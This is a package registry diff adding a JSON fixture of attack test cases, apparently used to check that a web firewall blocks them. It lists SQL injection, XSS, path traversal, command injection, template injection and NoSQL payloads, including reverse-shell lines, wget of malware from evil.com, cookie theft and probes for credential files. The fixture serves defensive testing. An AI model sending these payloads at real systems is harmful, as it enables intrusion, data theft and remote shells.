iri-shield 1.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,2596 @@
1
+ [
2
+ {
3
+ "id": "ATK-SQL_-001",
4
+ "category": "SQL_INJECTION",
5
+ "severity": "critical",
6
+ "expectedAction": "blocked",
7
+ "method": "GET",
8
+ "url": "/api/search?q=' OR '1'='1",
9
+ "headers": {
10
+ "user-agent": "AttackVerificationHarness/2.0"
11
+ }
12
+ },
13
+ {
14
+ "id": "ATK-SQL_-002",
15
+ "category": "SQL_INJECTION",
16
+ "severity": "critical",
17
+ "expectedAction": "blocked",
18
+ "method": "GET",
19
+ "url": "/api/users?id=1 UNION SELECT null, username, password FROM users--",
20
+ "headers": {
21
+ "user-agent": "AttackVerificationHarness/2.0"
22
+ }
23
+ },
24
+ {
25
+ "id": "ATK-SQL_-003",
26
+ "category": "SQL_INJECTION",
27
+ "severity": "critical",
28
+ "expectedAction": "blocked",
29
+ "method": "GET",
30
+ "url": "/api/items?cat=tech'; DROP TABLE products;--",
31
+ "headers": {
32
+ "user-agent": "AttackVerificationHarness/2.0"
33
+ }
34
+ },
35
+ {
36
+ "id": "ATK-SQL_-004",
37
+ "category": "SQL_INJECTION",
38
+ "severity": "critical",
39
+ "expectedAction": "blocked",
40
+ "method": "POST",
41
+ "url": "/api/login",
42
+ "headers": {
43
+ "user-agent": "AttackVerificationHarness/2.0"
44
+ },
45
+ "body": {
46
+ "username": "admin' --",
47
+ "password": "pwd"
48
+ }
49
+ },
50
+ {
51
+ "id": "ATK-SQL_-005",
52
+ "category": "SQL_INJECTION",
53
+ "severity": "critical",
54
+ "expectedAction": "blocked",
55
+ "method": "POST",
56
+ "url": "/api/login",
57
+ "headers": {
58
+ "user-agent": "AttackVerificationHarness/2.0"
59
+ },
60
+ "body": {
61
+ "username": "admin' OR 1=1 #",
62
+ "password": "pwd"
63
+ }
64
+ },
65
+ {
66
+ "id": "ATK-SQL_-006",
67
+ "category": "SQL_INJECTION",
68
+ "severity": "critical",
69
+ "expectedAction": "blocked",
70
+ "method": "GET",
71
+ "url": "/api/query?sort=name; EXEC xp_cmdshell('dir')",
72
+ "headers": {
73
+ "user-agent": "AttackVerificationHarness/2.0"
74
+ }
75
+ },
76
+ {
77
+ "id": "ATK-SQL_-007",
78
+ "category": "SQL_INJECTION",
79
+ "severity": "critical",
80
+ "expectedAction": "blocked",
81
+ "method": "GET",
82
+ "url": "/api/filter?val=%27%20OR%201%3D1--",
83
+ "headers": {
84
+ "user-agent": "AttackVerificationHarness/2.0"
85
+ }
86
+ },
87
+ {
88
+ "id": "ATK-SQL_-008",
89
+ "category": "SQL_INJECTION",
90
+ "severity": "high",
91
+ "expectedAction": "temporary_block",
92
+ "method": "GET",
93
+ "url": "/api/check?code=' or 1=1",
94
+ "headers": {
95
+ "user-agent": "AttackVerificationHarness/2.0"
96
+ }
97
+ },
98
+ {
99
+ "id": "ATK-SQL_-009",
100
+ "category": "SQL_INJECTION",
101
+ "severity": "high",
102
+ "expectedAction": "temporary_block",
103
+ "method": "GET",
104
+ "url": "/api/orders?status=active' AND 1=1--",
105
+ "headers": {
106
+ "user-agent": "AttackVerificationHarness/2.0"
107
+ }
108
+ },
109
+ {
110
+ "id": "ATK-SQL_-010",
111
+ "category": "SQL_INJECTION",
112
+ "severity": "high",
113
+ "expectedAction": "temporary_block",
114
+ "method": "POST",
115
+ "url": "/api/data",
116
+ "headers": {
117
+ "user-agent": "AttackVerificationHarness/2.0"
118
+ },
119
+ "body": {
120
+ "filter": "1' or 'a'='a"
121
+ }
122
+ },
123
+ {
124
+ "id": "ATK-SQL_-011",
125
+ "category": "SQL_INJECTION",
126
+ "severity": "critical",
127
+ "expectedAction": "blocked",
128
+ "method": "GET",
129
+ "url": "/api/records?filter=test' union select 1,2,3--",
130
+ "headers": {
131
+ "user-agent": "AttackVerificationHarness/2.0"
132
+ }
133
+ },
134
+ {
135
+ "id": "ATK-SQL_-012",
136
+ "category": "SQL_INJECTION",
137
+ "severity": "critical",
138
+ "expectedAction": "blocked",
139
+ "method": "GET",
140
+ "url": "/api/audit?q=1; INSERT INTO users VALUES ('hacker','pwd')",
141
+ "headers": {
142
+ "user-agent": "AttackVerificationHarness/2.0"
143
+ }
144
+ },
145
+ {
146
+ "id": "ATK-SQL_-013",
147
+ "category": "SQL_INJECTION",
148
+ "severity": "critical",
149
+ "expectedAction": "blocked",
150
+ "method": "GET",
151
+ "url": "/api/audit?q=1; DELETE FROM logs WHERE 1=1",
152
+ "headers": {
153
+ "user-agent": "AttackVerificationHarness/2.0"
154
+ }
155
+ },
156
+ {
157
+ "id": "ATK-SQL_-014",
158
+ "category": "SQL_INJECTION",
159
+ "severity": "critical",
160
+ "expectedAction": "blocked",
161
+ "method": "GET",
162
+ "url": "/api/audit?q=1; UPDATE users SET role='admin' WHERE id=5",
163
+ "headers": {
164
+ "user-agent": "AttackVerificationHarness/2.0"
165
+ }
166
+ },
167
+ {
168
+ "id": "ATK-SQL_-015",
169
+ "category": "SQL_INJECTION",
170
+ "severity": "high",
171
+ "expectedAction": "temporary_block",
172
+ "method": "GET",
173
+ "url": "/api/search?q=test%27%20and%201%3D1",
174
+ "headers": {
175
+ "user-agent": "AttackVerificationHarness/2.0"
176
+ }
177
+ },
178
+ {
179
+ "id": "ATK-XSS-016",
180
+ "category": "XSS",
181
+ "severity": "high",
182
+ "expectedAction": "temporary_block",
183
+ "method": "GET",
184
+ "url": "/api/comments?msg=<script>alert('XSS')</script>",
185
+ "headers": {
186
+ "user-agent": "AttackVerificationHarness/2.0"
187
+ }
188
+ },
189
+ {
190
+ "id": "ATK-XSS-017",
191
+ "category": "XSS",
192
+ "severity": "high",
193
+ "expectedAction": "temporary_block",
194
+ "method": "POST",
195
+ "url": "/api/profile",
196
+ "headers": {
197
+ "user-agent": "AttackVerificationHarness/2.0"
198
+ },
199
+ "body": {
200
+ "bio": "<img src=x onerror=alert(document.cookie)>"
201
+ }
202
+ },
203
+ {
204
+ "id": "ATK-XSS-018",
205
+ "category": "XSS",
206
+ "severity": "high",
207
+ "expectedAction": "temporary_block",
208
+ "method": "GET",
209
+ "url": "/api/feedback?text=javascript:alert(1)",
210
+ "headers": {
211
+ "user-agent": "AttackVerificationHarness/2.0"
212
+ }
213
+ },
214
+ {
215
+ "id": "ATK-XSS-019",
216
+ "category": "XSS",
217
+ "severity": "high",
218
+ "expectedAction": "temporary_block",
219
+ "method": "GET",
220
+ "url": "/api/view?name=<svg onload=alert('XSS')>",
221
+ "headers": {
222
+ "user-agent": "AttackVerificationHarness/2.0"
223
+ }
224
+ },
225
+ {
226
+ "id": "ATK-XSS-020",
227
+ "category": "XSS",
228
+ "severity": "high",
229
+ "expectedAction": "temporary_block",
230
+ "method": "POST",
231
+ "url": "/api/items",
232
+ "headers": {
233
+ "user-agent": "AttackVerificationHarness/2.0"
234
+ },
235
+ "body": {
236
+ "desc": "<iframe src=javascript:document.cookie>"
237
+ }
238
+ },
239
+ {
240
+ "id": "ATK-XSS-021",
241
+ "category": "XSS",
242
+ "severity": "high",
243
+ "expectedAction": "temporary_block",
244
+ "method": "GET",
245
+ "url": "/api/render?html=<body onload=eval(atob('ZG9jdW1lbnQud3JpdGUoMSk='))>",
246
+ "headers": {
247
+ "user-agent": "AttackVerificationHarness/2.0"
248
+ }
249
+ },
250
+ {
251
+ "id": "ATK-XSS-022",
252
+ "category": "XSS",
253
+ "severity": "medium",
254
+ "expectedAction": "rate_limited",
255
+ "method": "POST",
256
+ "url": "/api/post",
257
+ "headers": {
258
+ "user-agent": "AttackVerificationHarness/2.0"
259
+ },
260
+ "body": {
261
+ "content": "<div onclick=\"document.write('hacked')\">"
262
+ }
263
+ },
264
+ {
265
+ "id": "ATK-XSS-023",
266
+ "category": "XSS",
267
+ "severity": "high",
268
+ "expectedAction": "temporary_block",
269
+ "method": "GET",
270
+ "url": "/api/user?name=<input onfocus=alert(1) autofocus>",
271
+ "headers": {
272
+ "user-agent": "AttackVerificationHarness/2.0"
273
+ }
274
+ },
275
+ {
276
+ "id": "ATK-XSS-024",
277
+ "category": "XSS",
278
+ "severity": "medium",
279
+ "expectedAction": "rate_limited",
280
+ "method": "GET",
281
+ "url": "/api/echo?s=document.cookie",
282
+ "headers": {
283
+ "user-agent": "AttackVerificationHarness/2.0"
284
+ }
285
+ },
286
+ {
287
+ "id": "ATK-XSS-025",
288
+ "category": "XSS",
289
+ "severity": "critical",
290
+ "expectedAction": "blocked",
291
+ "method": "GET",
292
+ "url": "/api/tag?t=<script src='http://evil.com/xss.js'></script>",
293
+ "headers": {
294
+ "user-agent": "AttackVerificationHarness/2.0"
295
+ }
296
+ },
297
+ {
298
+ "id": "ATK-XSS-026",
299
+ "category": "XSS",
300
+ "severity": "critical",
301
+ "expectedAction": "blocked",
302
+ "method": "POST",
303
+ "url": "/api/note",
304
+ "headers": {
305
+ "user-agent": "AttackVerificationHarness/2.0"
306
+ },
307
+ "body": {
308
+ "note": "test<script>fetch('/stolen?c='+document.cookie)</script>"
309
+ }
310
+ },
311
+ {
312
+ "id": "ATK-XSS-027",
313
+ "category": "XSS",
314
+ "severity": "high",
315
+ "expectedAction": "temporary_block",
316
+ "method": "GET",
317
+ "url": "/api/search?q=<a href='javascript:alert(1)'>click me</a>",
318
+ "headers": {
319
+ "user-agent": "AttackVerificationHarness/2.0"
320
+ }
321
+ },
322
+ {
323
+ "id": "ATK-PATH-028",
324
+ "category": "PATH_TRAVERSAL",
325
+ "severity": "critical",
326
+ "expectedAction": "blocked",
327
+ "method": "GET",
328
+ "url": "/api/download?file=../../../../etc/passwd",
329
+ "headers": {
330
+ "user-agent": "AttackVerificationHarness/2.0"
331
+ }
332
+ },
333
+ {
334
+ "id": "ATK-PATH-029",
335
+ "category": "PATH_TRAVERSAL",
336
+ "severity": "critical",
337
+ "expectedAction": "blocked",
338
+ "method": "GET",
339
+ "url": "/api/view?path=..%2F..%2F..%2Fwindows%2Fsystem32%2Fcmd.exe",
340
+ "headers": {
341
+ "user-agent": "AttackVerificationHarness/2.0"
342
+ }
343
+ },
344
+ {
345
+ "id": "ATK-PATH-030",
346
+ "category": "PATH_TRAVERSAL",
347
+ "severity": "critical",
348
+ "expectedAction": "blocked",
349
+ "method": "GET",
350
+ "url": "/api/read?file=../../../etc/shadow",
351
+ "headers": {
352
+ "user-agent": "AttackVerificationHarness/2.0"
353
+ }
354
+ },
355
+ {
356
+ "id": "ATK-PATH-031",
357
+ "category": "PATH_TRAVERSAL",
358
+ "severity": "high",
359
+ "expectedAction": "temporary_block",
360
+ "method": "GET",
361
+ "url": "/api/load?doc=..\\..\\..\\boot.ini",
362
+ "headers": {
363
+ "user-agent": "AttackVerificationHarness/2.0"
364
+ }
365
+ },
366
+ {
367
+ "id": "ATK-PATH-032",
368
+ "category": "PATH_TRAVERSAL",
369
+ "severity": "critical",
370
+ "expectedAction": "blocked",
371
+ "method": "GET",
372
+ "url": "/api/static?file=....//....//etc/passwd",
373
+ "headers": {
374
+ "user-agent": "AttackVerificationHarness/2.0"
375
+ }
376
+ },
377
+ {
378
+ "id": "ATK-PATH-033",
379
+ "category": "PATH_TRAVERSAL",
380
+ "severity": "high",
381
+ "expectedAction": "temporary_block",
382
+ "method": "GET",
383
+ "url": "/api/fetch?res=../../../../var/log/auth.log",
384
+ "headers": {
385
+ "user-agent": "AttackVerificationHarness/2.0"
386
+ }
387
+ },
388
+ {
389
+ "id": "ATK-PATH-034",
390
+ "category": "PATH_TRAVERSAL",
391
+ "severity": "high",
392
+ "expectedAction": "temporary_block",
393
+ "method": "GET",
394
+ "url": "/api/asset?img=../../../etc/hosts",
395
+ "headers": {
396
+ "user-agent": "AttackVerificationHarness/2.0"
397
+ }
398
+ },
399
+ {
400
+ "id": "ATK-PATH-035",
401
+ "category": "PATH_TRAVERSAL",
402
+ "severity": "critical",
403
+ "expectedAction": "blocked",
404
+ "method": "GET",
405
+ "url": "/api/files/download?f=../../../../app/.env",
406
+ "headers": {
407
+ "user-agent": "AttackVerificationHarness/2.0"
408
+ }
409
+ },
410
+ {
411
+ "id": "ATK-PATH-036",
412
+ "category": "PATH_TRAVERSAL",
413
+ "severity": "high",
414
+ "expectedAction": "temporary_block",
415
+ "method": "GET",
416
+ "url": "/api/docs?p=..%2F..%2F..%2Fetc%2Fgroup",
417
+ "headers": {
418
+ "user-agent": "AttackVerificationHarness/2.0"
419
+ }
420
+ },
421
+ {
422
+ "id": "ATK-PATH-037",
423
+ "category": "PATH_TRAVERSAL",
424
+ "severity": "high",
425
+ "expectedAction": "temporary_block",
426
+ "method": "GET",
427
+ "url": "/api/export?path=../../../../usr/local/etc/config",
428
+ "headers": {
429
+ "user-agent": "AttackVerificationHarness/2.0"
430
+ }
431
+ },
432
+ {
433
+ "id": "ATK-COMM-038",
434
+ "category": "COMMAND_INJECTION",
435
+ "severity": "critical",
436
+ "expectedAction": "blocked",
437
+ "method": "GET",
438
+ "url": "/api/ping?host=127.0.0.1; cat /etc/passwd",
439
+ "headers": {
440
+ "user-agent": "AttackVerificationHarness/2.0"
441
+ }
442
+ },
443
+ {
444
+ "id": "ATK-COMM-039",
445
+ "category": "COMMAND_INJECTION",
446
+ "severity": "critical",
447
+ "expectedAction": "blocked",
448
+ "method": "GET",
449
+ "url": "/api/dns?domain=google.com && whoami",
450
+ "headers": {
451
+ "user-agent": "AttackVerificationHarness/2.0"
452
+ }
453
+ },
454
+ {
455
+ "id": "ATK-COMM-040",
456
+ "category": "COMMAND_INJECTION",
457
+ "severity": "critical",
458
+ "expectedAction": "blocked",
459
+ "method": "GET",
460
+ "url": "/api/test?cmd=127.0.0.1 | ls -la",
461
+ "headers": {
462
+ "user-agent": "AttackVerificationHarness/2.0"
463
+ }
464
+ },
465
+ {
466
+ "id": "ATK-COMM-041",
467
+ "category": "COMMAND_INJECTION",
468
+ "severity": "critical",
469
+ "expectedAction": "blocked",
470
+ "method": "POST",
471
+ "url": "/api/exec",
472
+ "headers": {
473
+ "user-agent": "AttackVerificationHarness/2.0"
474
+ },
475
+ "body": {
476
+ "command": "test `id`"
477
+ }
478
+ },
479
+ {
480
+ "id": "ATK-COMM-042",
481
+ "category": "COMMAND_INJECTION",
482
+ "severity": "critical",
483
+ "expectedAction": "blocked",
484
+ "method": "GET",
485
+ "url": "/api/network?ip=127.0.0.1; wget http://evil.com/malware.sh",
486
+ "headers": {
487
+ "user-agent": "AttackVerificationHarness/2.0"
488
+ }
489
+ },
490
+ {
491
+ "id": "ATK-COMM-043",
492
+ "category": "COMMAND_INJECTION",
493
+ "severity": "critical",
494
+ "expectedAction": "blocked",
495
+ "method": "GET",
496
+ "url": "/api/status?host=localhost; uname -a",
497
+ "headers": {
498
+ "user-agent": "AttackVerificationHarness/2.0"
499
+ }
500
+ },
501
+ {
502
+ "id": "ATK-COMM-044",
503
+ "category": "COMMAND_INJECTION",
504
+ "severity": "critical",
505
+ "expectedAction": "blocked",
506
+ "method": "POST",
507
+ "url": "/api/run",
508
+ "headers": {
509
+ "user-agent": "AttackVerificationHarness/2.0"
510
+ },
511
+ "body": {
512
+ "script": "$(nc -e /bin/sh 10.0.0.1 4444)"
513
+ }
514
+ },
515
+ {
516
+ "id": "ATK-COMM-045",
517
+ "category": "COMMAND_INJECTION",
518
+ "severity": "critical",
519
+ "expectedAction": "blocked",
520
+ "method": "GET",
521
+ "url": "/api/calc?expr=1; python -c 'import socket'",
522
+ "headers": {
523
+ "user-agent": "AttackVerificationHarness/2.0"
524
+ }
525
+ },
526
+ {
527
+ "id": "ATK-COMM-046",
528
+ "category": "COMMAND_INJECTION",
529
+ "severity": "critical",
530
+ "expectedAction": "blocked",
531
+ "method": "GET",
532
+ "url": "/api/service?name=app && id",
533
+ "headers": {
534
+ "user-agent": "AttackVerificationHarness/2.0"
535
+ }
536
+ },
537
+ {
538
+ "id": "ATK-COMM-047",
539
+ "category": "COMMAND_INJECTION",
540
+ "severity": "critical",
541
+ "expectedAction": "blocked",
542
+ "method": "GET",
543
+ "url": "/api/backup?dest=/tmp; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1",
544
+ "headers": {
545
+ "user-agent": "AttackVerificationHarness/2.0"
546
+ }
547
+ },
548
+ {
549
+ "id": "ATK-SSTI-048",
550
+ "category": "SSTI",
551
+ "severity": "high",
552
+ "expectedAction": "temporary_block",
553
+ "method": "GET",
554
+ "url": "/api/render?template={{7*7}}",
555
+ "headers": {
556
+ "user-agent": "AttackVerificationHarness/2.0"
557
+ }
558
+ },
559
+ {
560
+ "id": "ATK-SSTI-049",
561
+ "category": "SSTI",
562
+ "severity": "high",
563
+ "expectedAction": "temporary_block",
564
+ "method": "GET",
565
+ "url": "/api/greeting?name=${7*7}",
566
+ "headers": {
567
+ "user-agent": "AttackVerificationHarness/2.0"
568
+ }
569
+ },
570
+ {
571
+ "id": "ATK-SSTI-050",
572
+ "category": "SSTI",
573
+ "severity": "critical",
574
+ "expectedAction": "blocked",
575
+ "method": "GET",
576
+ "url": "/api/page?tpl={{config.items()}}",
577
+ "headers": {
578
+ "user-agent": "AttackVerificationHarness/2.0"
579
+ }
580
+ },
581
+ {
582
+ "id": "ATK-SSTI-051",
583
+ "category": "SSTI",
584
+ "severity": "high",
585
+ "expectedAction": "temporary_block",
586
+ "method": "POST",
587
+ "url": "/api/preview",
588
+ "headers": {
589
+ "user-agent": "AttackVerificationHarness/2.0"
590
+ },
591
+ "body": {
592
+ "content": "#{7*7}"
593
+ }
594
+ },
595
+ {
596
+ "id": "ATK-SSTI-052",
597
+ "category": "SSTI",
598
+ "severity": "high",
599
+ "expectedAction": "temporary_block",
600
+ "method": "GET",
601
+ "url": "/api/mail?body=<% 7*7 %>",
602
+ "headers": {
603
+ "user-agent": "AttackVerificationHarness/2.0"
604
+ }
605
+ },
606
+ {
607
+ "id": "ATK-SSTI-053",
608
+ "category": "SSTI",
609
+ "severity": "critical",
610
+ "expectedAction": "blocked",
611
+ "method": "GET",
612
+ "url": "/api/view?t={% import os %}{{ os.popen('whoami').read() }}",
613
+ "headers": {
614
+ "user-agent": "AttackVerificationHarness/2.0"
615
+ }
616
+ },
617
+ {
618
+ "id": "ATK-SSTI-054",
619
+ "category": "SSTI",
620
+ "severity": "critical",
621
+ "expectedAction": "blocked",
622
+ "method": "GET",
623
+ "url": "/api/format?fmt={{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
624
+ "headers": {
625
+ "user-agent": "AttackVerificationHarness/2.0"
626
+ }
627
+ },
628
+ {
629
+ "id": "ATK-SSTI-055",
630
+ "category": "SSTI",
631
+ "severity": "critical",
632
+ "expectedAction": "blocked",
633
+ "method": "GET",
634
+ "url": "/api/render?q=${T(java.lang.Runtime).getRuntime().exec('whoami')}",
635
+ "headers": {
636
+ "user-agent": "AttackVerificationHarness/2.0"
637
+ }
638
+ },
639
+ {
640
+ "id": "ATK-SSTI-056",
641
+ "category": "SSTI",
642
+ "severity": "critical",
643
+ "expectedAction": "blocked",
644
+ "method": "GET",
645
+ "url": "/api/view?t={{''.__class__.__mro__[2].__subclasses__()}}",
646
+ "headers": {
647
+ "user-agent": "AttackVerificationHarness/2.0"
648
+ }
649
+ },
650
+ {
651
+ "id": "ATK-SSTI-057",
652
+ "category": "SSTI",
653
+ "severity": "high",
654
+ "expectedAction": "temporary_block",
655
+ "method": "GET",
656
+ "url": "/api/display?title={{self._TemplateReference__context.cycler}}",
657
+ "headers": {
658
+ "user-agent": "AttackVerificationHarness/2.0"
659
+ }
660
+ },
661
+ {
662
+ "id": "ATK-NOSQ-058",
663
+ "category": "NOSQL_INJECTION",
664
+ "severity": "high",
665
+ "expectedAction": "temporary_block",
666
+ "method": "GET",
667
+ "url": "/api/users?user[$gt]=",
668
+ "headers": {
669
+ "user-agent": "AttackVerificationHarness/2.0"
670
+ }
671
+ },
672
+ {
673
+ "id": "ATK-NOSQ-059",
674
+ "category": "NOSQL_INJECTION",
675
+ "severity": "critical",
676
+ "expectedAction": "blocked",
677
+ "method": "POST",
678
+ "url": "/api/login",
679
+ "headers": {
680
+ "user-agent": "AttackVerificationHarness/2.0"
681
+ },
682
+ "body": {
683
+ "username": {
684
+ "$ne": null
685
+ },
686
+ "password": {
687
+ "$ne": null
688
+ }
689
+ }
690
+ },
691
+ {
692
+ "id": "ATK-NOSQ-060",
693
+ "category": "NOSQL_INJECTION",
694
+ "severity": "critical",
695
+ "expectedAction": "blocked",
696
+ "method": "POST",
697
+ "url": "/api/find",
698
+ "headers": {
699
+ "user-agent": "AttackVerificationHarness/2.0"
700
+ },
701
+ "body": {
702
+ "role": {
703
+ "$in": [
704
+ "admin",
705
+ "superadmin"
706
+ ]
707
+ },
708
+ "$where": "this.password.length > 0"
709
+ }
710
+ },
711
+ {
712
+ "id": "ATK-NOSQ-061",
713
+ "category": "NOSQL_INJECTION",
714
+ "severity": "high",
715
+ "expectedAction": "temporary_block",
716
+ "method": "GET",
717
+ "url": "/api/filter?name[$regex]=^adm",
718
+ "headers": {
719
+ "user-agent": "AttackVerificationHarness/2.0"
720
+ }
721
+ },
722
+ {
723
+ "id": "ATK-NOSQ-062",
724
+ "category": "NOSQL_INJECTION",
725
+ "severity": "high",
726
+ "expectedAction": "temporary_block",
727
+ "method": "POST",
728
+ "url": "/api/query",
729
+ "headers": {
730
+ "user-agent": "AttackVerificationHarness/2.0"
731
+ },
732
+ "body": {
733
+ "$or": [
734
+ {
735
+ "role": "admin"
736
+ },
737
+ {
738
+ "user": "test"
739
+ }
740
+ ]
741
+ }
742
+ },
743
+ {
744
+ "id": "ATK-NOSQ-063",
745
+ "category": "NOSQL_INJECTION",
746
+ "severity": "medium",
747
+ "expectedAction": "rate_limited",
748
+ "method": "POST",
749
+ "url": "/api/lookup",
750
+ "headers": {
751
+ "user-agent": "AttackVerificationHarness/2.0"
752
+ },
753
+ "body": {
754
+ "id": {
755
+ "$exists": true
756
+ }
757
+ }
758
+ },
759
+ {
760
+ "id": "ATK-NOSQ-064",
761
+ "category": "NOSQL_INJECTION",
762
+ "severity": "high",
763
+ "expectedAction": "temporary_block",
764
+ "method": "POST",
765
+ "url": "/api/search",
766
+ "headers": {
767
+ "user-agent": "AttackVerificationHarness/2.0"
768
+ },
769
+ "body": {
770
+ "balance": {
771
+ "$gt": 0
772
+ }
773
+ }
774
+ },
775
+ {
776
+ "id": "ATK-NOSQ-065",
777
+ "category": "NOSQL_INJECTION",
778
+ "severity": "high",
779
+ "expectedAction": "temporary_block",
780
+ "method": "GET",
781
+ "url": "/api/users?token[$ne]=1",
782
+ "headers": {
783
+ "user-agent": "AttackVerificationHarness/2.0"
784
+ }
785
+ },
786
+ {
787
+ "id": "ATK-SCAN-066",
788
+ "category": "SCANNER_BOT",
789
+ "severity": "critical",
790
+ "expectedAction": "blocked",
791
+ "method": "GET",
792
+ "url": "/api/items?id=1",
793
+ "headers": {
794
+ "user-agent": "sqlmap/1.8#stable"
795
+ }
796
+ },
797
+ {
798
+ "id": "ATK-SCAN-067",
799
+ "category": "SCANNER_BOT",
800
+ "severity": "critical",
801
+ "expectedAction": "blocked",
802
+ "method": "GET",
803
+ "url": "/api/health",
804
+ "headers": {
805
+ "user-agent": "Mozilla/5.0 (compatible; Nikto/2.1.6; +http://cirt.net/nikto/)"
806
+ }
807
+ },
808
+ {
809
+ "id": "ATK-SCAN-068",
810
+ "category": "SCANNER_BOT",
811
+ "severity": "critical",
812
+ "expectedAction": "blocked",
813
+ "method": "GET",
814
+ "url": "/api/data",
815
+ "headers": {
816
+ "user-agent": "masscan/1.3.2 (https://github.com/robertdavidgraham/masscan)"
817
+ }
818
+ },
819
+ {
820
+ "id": "ATK-SCAN-069",
821
+ "category": "SCANNER_BOT",
822
+ "severity": "critical",
823
+ "expectedAction": "blocked",
824
+ "method": "GET",
825
+ "url": "/api/test",
826
+ "headers": {
827
+ "user-agent": "Nmap Scripting Engine (https://nmap.org/book/nse.html)"
828
+ }
829
+ },
830
+ {
831
+ "id": "ATK-SCAN-070",
832
+ "category": "SCANNER_BOT",
833
+ "severity": "critical",
834
+ "expectedAction": "blocked",
835
+ "method": "GET",
836
+ "url": "/api/status",
837
+ "headers": {
838
+ "user-agent": "zgrab/0.x"
839
+ }
840
+ },
841
+ {
842
+ "id": "ATK-SCAN-071",
843
+ "category": "SCANNER_BOT",
844
+ "severity": "critical",
845
+ "expectedAction": "blocked",
846
+ "method": "GET",
847
+ "url": "/api/check",
848
+ "headers": {
849
+ "user-agent": "DirBuster-1.0-RC1 (http://www.owasp.org/)"
850
+ }
851
+ },
852
+ {
853
+ "id": "ATK-SCAN-072",
854
+ "category": "SCANNER_BOT",
855
+ "severity": "critical",
856
+ "expectedAction": "blocked",
857
+ "method": "GET",
858
+ "url": "/api/probe",
859
+ "headers": {
860
+ "user-agent": "gobuster/3.5"
861
+ }
862
+ },
863
+ {
864
+ "id": "ATK-SCAN-073",
865
+ "category": "SCANNER_BOT",
866
+ "severity": "critical",
867
+ "expectedAction": "blocked",
868
+ "method": "GET",
869
+ "url": "/api/fuzz",
870
+ "headers": {
871
+ "user-agent": "Wfuzz/3.1.0 - The Web Fuzzer"
872
+ }
873
+ },
874
+ {
875
+ "id": "ATK-SCAN-074",
876
+ "category": "SCANNER_BOT",
877
+ "severity": "critical",
878
+ "expectedAction": "blocked",
879
+ "method": "POST",
880
+ "url": "/api/login",
881
+ "headers": {
882
+ "user-agent": "Mozilla/4.0 (Hydra)"
883
+ }
884
+ },
885
+ {
886
+ "id": "ATK-SCAN-075",
887
+ "category": "SCANNER_BOT",
888
+ "severity": "critical",
889
+ "expectedAction": "blocked",
890
+ "method": "GET",
891
+ "url": "/api/recon",
892
+ "headers": {
893
+ "user-agent": "BurpSuite/Pro_2023.12"
894
+ }
895
+ },
896
+ {
897
+ "id": "ATK-SCAN-076",
898
+ "category": "SCANNER_BOT",
899
+ "severity": "critical",
900
+ "expectedAction": "blocked",
901
+ "method": "GET",
902
+ "url": "/api/exploit",
903
+ "headers": {
904
+ "user-agent": "metasploit-framework"
905
+ }
906
+ },
907
+ {
908
+ "id": "ATK-SCAN-077",
909
+ "category": "SCANNER_BOT",
910
+ "severity": "high",
911
+ "expectedAction": "temporary_block",
912
+ "method": "GET",
913
+ "url": "/api/headless",
914
+ "headers": {
915
+ "user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 HeadlessChrome/118.0.0.0 Safari/537.36"
916
+ }
917
+ },
918
+ {
919
+ "id": "ATK-SCAN-078",
920
+ "category": "SCANNER_BOT",
921
+ "severity": "high",
922
+ "expectedAction": "temporary_block",
923
+ "method": "GET",
924
+ "url": "/api/auto",
925
+ "headers": {
926
+ "user-agent": "Mozilla/5.0 PhantomJS/2.1.1 (Linux)"
927
+ }
928
+ },
929
+ {
930
+ "id": "ATK-SCAN-079",
931
+ "category": "SCANNER_BOT",
932
+ "severity": "medium",
933
+ "expectedAction": "rate_limited",
934
+ "method": "GET",
935
+ "url": "/api/crawl",
936
+ "headers": {
937
+ "user-agent": "python-requests/2.31.0"
938
+ }
939
+ },
940
+ {
941
+ "id": "ATK-SCAN-080",
942
+ "category": "SCANNER_BOT",
943
+ "severity": "medium",
944
+ "expectedAction": "rate_limited",
945
+ "method": "GET",
946
+ "url": "/api/bot",
947
+ "headers": {
948
+ "user-agent": "Go-http-client/1.1"
949
+ }
950
+ },
951
+ {
952
+ "id": "ATK-SECR-081",
953
+ "category": "SECRET_PROBE",
954
+ "severity": "high",
955
+ "expectedAction": "temporary_block",
956
+ "method": "GET",
957
+ "url": "/.env",
958
+ "headers": {
959
+ "user-agent": "AttackVerificationHarness/2.0"
960
+ }
961
+ },
962
+ {
963
+ "id": "ATK-SECR-082",
964
+ "category": "SECRET_PROBE",
965
+ "severity": "high",
966
+ "expectedAction": "temporary_block",
967
+ "method": "GET",
968
+ "url": "/config.json",
969
+ "headers": {
970
+ "user-agent": "AttackVerificationHarness/2.0"
971
+ }
972
+ },
973
+ {
974
+ "id": "ATK-SECR-083",
975
+ "category": "SECRET_PROBE",
976
+ "severity": "high",
977
+ "expectedAction": "temporary_block",
978
+ "method": "GET",
979
+ "url": "/wp-config.php",
980
+ "headers": {
981
+ "user-agent": "AttackVerificationHarness/2.0"
982
+ }
983
+ },
984
+ {
985
+ "id": "ATK-SECR-084",
986
+ "category": "SECRET_PROBE",
987
+ "severity": "critical",
988
+ "expectedAction": "blocked",
989
+ "method": "GET",
990
+ "url": "/.git/config",
991
+ "headers": {
992
+ "user-agent": "AttackVerificationHarness/2.0"
993
+ }
994
+ },
995
+ {
996
+ "id": "ATK-SECR-085",
997
+ "category": "SECRET_PROBE",
998
+ "severity": "high",
999
+ "expectedAction": "temporary_block",
1000
+ "method": "GET",
1001
+ "url": "/.htaccess",
1002
+ "headers": {
1003
+ "user-agent": "AttackVerificationHarness/2.0"
1004
+ }
1005
+ },
1006
+ {
1007
+ "id": "ATK-SECR-086",
1008
+ "category": "SECRET_PROBE",
1009
+ "severity": "critical",
1010
+ "expectedAction": "blocked",
1011
+ "method": "GET",
1012
+ "url": "/id_rsa",
1013
+ "headers": {
1014
+ "user-agent": "AttackVerificationHarness/2.0"
1015
+ }
1016
+ },
1017
+ {
1018
+ "id": "ATK-SECR-087",
1019
+ "category": "SECRET_PROBE",
1020
+ "severity": "critical",
1021
+ "expectedAction": "blocked",
1022
+ "method": "GET",
1023
+ "url": "/private_key.pem",
1024
+ "headers": {
1025
+ "user-agent": "AttackVerificationHarness/2.0"
1026
+ }
1027
+ },
1028
+ {
1029
+ "id": "ATK-SECR-088",
1030
+ "category": "SECRET_PROBE",
1031
+ "severity": "high",
1032
